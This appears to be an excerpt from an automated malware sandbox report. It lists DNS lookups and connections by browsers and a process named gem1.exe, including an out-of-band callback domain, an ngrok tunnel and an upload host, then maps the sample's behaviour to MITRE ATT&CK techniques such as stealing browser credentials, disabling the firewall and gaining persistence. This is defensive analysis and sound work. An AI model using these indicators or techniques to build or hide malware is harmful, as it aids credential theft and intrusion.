DNS Response

2a00:1450:4009:81d::200a
142.250.180.10:443

addons-pa.clients6.google.com

https

firefox.exe

2.0kB
12.6kB
7
13
8.8.8.8:53

youtube.googleapis.com

dns

firefox.exe

484 B
960 B
7
7

DNS Request

youtube.googleapis.com

DNS Response

142.250.179.234

216.58.212.234

142.250.187.202

142.250.180.10

142.250.178.10

216.58.204.74

172.217.169.74

216.58.213.10

216.58.212.202

172.217.169.42

172.217.16.234

142.250.187.234

142.250.200.42

216.58.201.106

142.250.200.10

DNS Request

youtube.googleapis.com

DNS Response

2a00:1450:4009:823::200a

2a00:1450:4009:820::200a

2a00:1450:4009:815::200a

2a00:1450:4009:821::200a

DNS Request

10.180.250.142.in-addr.arpa

DNS Request

google.com

DNS Response

142.250.180.14

DNS Request

contacts.google.com

DNS Response

142.250.178.14

DNS Request

signaler-pa.clients6.google.com

DNS Response

172.217.169.74

DNS Request

signaler-pa.clients6.google.com

DNS Response

142.250.180.10
142.250.179.234:443

youtube.googleapis.com

https

firefox.exe

2.2kB
7.2kB
10
9
8.8.8.8:53

234.179.250.142.in-addr.arpa

dns

NetworkService

194 B
307 B
3
3

DNS Request

234.179.250.142.in-addr.arpa

DNS Request

ogs.google.com

DNS Response

142.250.178.14

DNS Request

ogs.google.com

DNS Response

142.250.178.14
172.217.169.78:443

drive.google.com

https

chrome.exe

11.0kB
9.1kB
16
17
142.250.179.238:443

play.google.com

https

chrome.exe

6.0kB
7.9kB
10
12
142.251.173.84:443

accounts.google.com

https

chrome.exe

2.3kB
7.8kB
7
11
142.250.180.14:443

google.com

https

chrome.exe

3.7kB
7.9kB
9
12
142.250.178.14:443

ogs.google.com

https

firefox.exe

2.2kB
9.4kB
10
11
142.250.178.14:443

ogs.google.com

https

firefox.exe

2.3kB
9.4kB
11
11
8.8.8.8:53

signaler-pa.clients6.google.com

dns

chrome.exe

154 B
210 B
2
2

DNS Request

signaler-pa.clients6.google.com

DNS Response

2a00:1450:4009:822::200a

DNS Request

signaler-pa.clients6.google.com

DNS Response

2a00:1450:4009:822::200a
172.217.169.74:443

signaler-pa.clients6.google.com

https

firefox.exe

7.0kB
15.2kB
18
29
8.8.8.8:53

74.169.217.172.in-addr.arpa

dns

NetworkService

146 B
224 B
2
2

DNS Request

74.169.217.172.in-addr.arpa

DNS Request

74.169.217.172.in-addr.arpa
8.8.8.8:53

location.services.mozilla.com

dns

firefox.exe

150 B
306 B
2
2

DNS Request

location.services.mozilla.com

DNS Response

35.190.72.216

DNS Request

location.services.mozilla.com

DNS Response

35.190.72.216
8.8.8.8:53

prod.classify-client.prod.webservices.mozgcp.net

dns

firefox.exe

188 B
220 B
2
2

DNS Request

prod.classify-client.prod.webservices.mozgcp.net

DNS Response

35.190.72.216

DNS Request

prod.classify-client.prod.webservices.mozgcp.net

DNS Response

35.190.72.216
8.8.8.8:53

prod.balrog.prod.cloudops.mozgcp.net

dns

firefox.exe

164 B
196 B
2
2

DNS Request

prod.balrog.prod.cloudops.mozgcp.net

DNS Response

35.244.181.201

DNS Request

prod.balrog.prod.cloudops.mozgcp.net

DNS Response

35.244.181.201
35.190.72.216:443

prod.classify-client.prod.webservices.mozgcp.net

https

firefox.exe

1.8kB
4.3kB
5
6
8.8.8.8:53

prod.classify-client.prod.webservices.mozgcp.net

dns

firefox.exe

298 B
671 B
4
4

DNS Request

prod.classify-client.prod.webservices.mozgcp.net

DNS Request

ciscobinary.openh264.org

DNS Response

88.221.134.209

88.221.134.155

DNS Request

a19.dscg10.akamai.net

DNS Response

88.221.134.155

88.221.134.209

DNS Request

a19.dscg10.akamai.net

DNS Response

88.221.134.209

88.221.134.155
8.8.8.8:53

prod.balrog.prod.cloudops.mozgcp.net

dns

firefox.exe

277 B
418 B
4
4

DNS Request

prod.balrog.prod.cloudops.mozgcp.net

DNS Request

redirector.gvt1.com

DNS Response

142.250.180.14

DNS Request

redirector.gvt1.com

DNS Response

142.250.180.14

DNS Request

redirector.gvt1.com

DNS Response

142.250.180.14
8.8.8.8:53

216.72.190.35.in-addr.arpa

dns

NetworkService

275 B
387 B
4
4

DNS Request

216.72.190.35.in-addr.arpa

DNS Request

redirector.gvt1.com

DNS Response

2a00:1450:4009:81e::200e

DNS Request

r2.sn-5hnednss.gvt1.com

DNS Response

172.217.132.199

DNS Request

r2.sn-5hnednss.gvt1.com

DNS Response

172.217.132.199
8.8.8.8:53

201.181.244.35.in-addr.arpa

dns

NetworkService

349 B
559 B
5
5

DNS Request

201.181.244.35.in-addr.arpa

DNS Request

a19.dscg10.akamai.net

DNS Response

2a02:26f0:a1::58dd:869b

2a02:26f0:a1::58dd:86d1

DNS Request

r2---sn-5hnednss.gvt1.com

DNS Response

172.217.132.199

DNS Request

r2.sn-5hnednss.gvt1.com

DNS Response

2a00:1450:400e:1b::7

DNS Request

r2.sn-5hnednss.gvt1.com

DNS Response

2a00:1450:400e:1b::7
142.250.180.14:443

redirector.gvt1.com

https

firefox.exe

2.0kB
9.3kB
8
10
172.217.132.199:443

r2---sn-5hnednss.gvt1.com

https

firefox.exe

1.8kB
5.9kB
5
8
8.8.8.8:53

209.134.221.88.in-addr.arpa

dns

NetworkService

344 B
534 B
5
5

DNS Request

209.134.221.88.in-addr.arpa

DNS Request

115.34.106.151.in-addr.arpa

DNS Request

128.161.97.34.in-addr.arpa

DNS Request

0.tcp.in.ngrok.io

DNS Response

13.202.226.61

DNS Request

0.tcp.in.ngrok.io

DNS Response

13.127.206.16
8.8.8.8:53

199.132.217.172.in-addr.arpa

dns

NetworkService

476 B
846 B
7
7

DNS Request

199.132.217.172.in-addr.arpa

DNS Request

e2c4.gcp.gvt2.com

DNS Response

34.97.161.128

DNS Request

0.tcp.in.ngrok.io

DNS Response

13.127.206.16

DNS Request

urlhaus.abuse.ch

DNS Response

151.101.130.49

151.101.2.49

151.101.66.49

151.101.194.49

DNS Request

41.117.36.101.in-addr.arpa

DNS Request

15.142.90.47.in-addr.arpa

DNS Request

15.142.90.47.in-addr.arpa
172.217.169.74:443

signaler-pa.clients6.google.com

https

firefox.exe

2.4kB
12.9kB
9
16
172.217.169.3:443

www.google.co.uk

https

chrome.exe

3.6kB
6.9kB
8
10
142.250.178.10:443

youtube.googleapis.com

https

chrome.exe

2.3kB
7.3kB
8
11
8.8.8.8:53

2.86.121.87.in-addr.arpa

dns

212 B
382 B
3
3

DNS Request

2.86.121.87.in-addr.arpa

DNS Request

32.168.58.82.in-addr.arpa

DNS Request

32.168.58.82.in-addr.arpa
8.8.8.8:53

244.51.27.23.in-addr.arpa

dns

388 B
618 B
6
6

DNS Request

244.51.27.23.in-addr.arpa

DNS Request

github.com

DNS Response

20.26.156.215

DNS Request

objects.githubusercontent.com

DNS Response

185.199.110.133

185.199.108.133

185.199.111.133

185.199.109.133

DNS Request

215.156.26.20.in-addr.arpa

DNS Request

evilbit.pro

DNS Response

104.21.95.99

172.67.144.26

DNS Request

evilbit.pro

DNS Response

172.67.144.26

104.21.95.99
8.8.8.8:53

133.110.199.185.in-addr.arpa

dns

409 B
634 B
6
6

DNS Request

133.110.199.185.in-addr.arpa

DNS Request

99.95.21.104.in-addr.arpa

DNS Request

lh3.googleusercontent.com

DNS Response

142.250.200.33

DNS Request

77.41.56.212.in-addr.arpa

DNS Request

www.gstatic.com

DNS Response

142.250.187.227

DNS Request

www.gstatic.com

DNS Response

142.250.187.227
142.250.187.196:443

www.google.com

https

6.6kB
14.8kB
21
23
142.250.187.238:443

clients.l.google.com

https

7.8kB
23.3kB
27
33
172.217.169.78:443

drive.google.com

https

21.1kB
665.9kB
137
570
216.58.212.238:443

lh2.l.google.com

https

4.2kB
10.3kB
11
13
142.250.200.33:443

lh3.googleusercontent.com

https

6.3kB
9.6kB
14
14
142.250.200.3:443

ssl.gstatic.com

https

3.9kB
7.2kB
14
14
142.250.187.238:443

clients.l.google.com

https

5.7kB
8.5kB
25
25
216.58.201.106:443

youtube.googleapis.com

https

2.3kB
7.5kB
9
11
142.250.187.202:443

youtube.googleapis.com

https

2.5kB
7.6kB
12
14
142.250.187.202:443

youtube.googleapis.com

https

8.9kB
34.4kB
29
40
216.58.201.106:443

youtube.googleapis.com

https

5.8kB
8.1kB
11
12
142.251.173.84:443

accounts.google.com

https

5.3kB
11.1kB
14
16
142.250.179.238:443

play.google.com

https

4.0kB
7.5kB
16
17
142.250.179.238:443

play.google.com

https

25.5kB
20.2kB
47
49
142.250.200.10:443

youtube.googleapis.com

https

7.8kB
9.3kB
16
16
142.250.187.234:443

youtube.googleapis.com

https

4.6kB
9.0kB
15
15
142.250.187.234:443

youtube.googleapis.com

https

6.1kB
9.1kB
13
15
142.250.178.10:443

youtube.googleapis.com

https

3.6kB
7.4kB
11
11
142.250.178.14:443

ogs.google.com

https

3.2kB
8.5kB
8
9
142.250.178.14:443

ogs.google.com

https

8.2kB
38.8kB
29
42
142.250.178.10:443

youtube.googleapis.com

https

5.5kB
8.5kB
10
13
8.8.8.8:53

api.ipify.org

dns

gem1.exe

359 B
617 B
5
5

DNS Request

api.ipify.org

DNS Response

104.26.13.205

104.26.12.205

172.67.74.152

DNS Request

wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun

DNS Response

206.189.156.69

DNS Request

upload.vina-host.com

DNS Response

125.212.220.95

DNS Request

95.220.212.125.in-addr.arpa

DNS Request

95.220.212.125.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Network Share Discovery

T1135

Query Registry

Remote System Discovery

T1018

System Information Discovery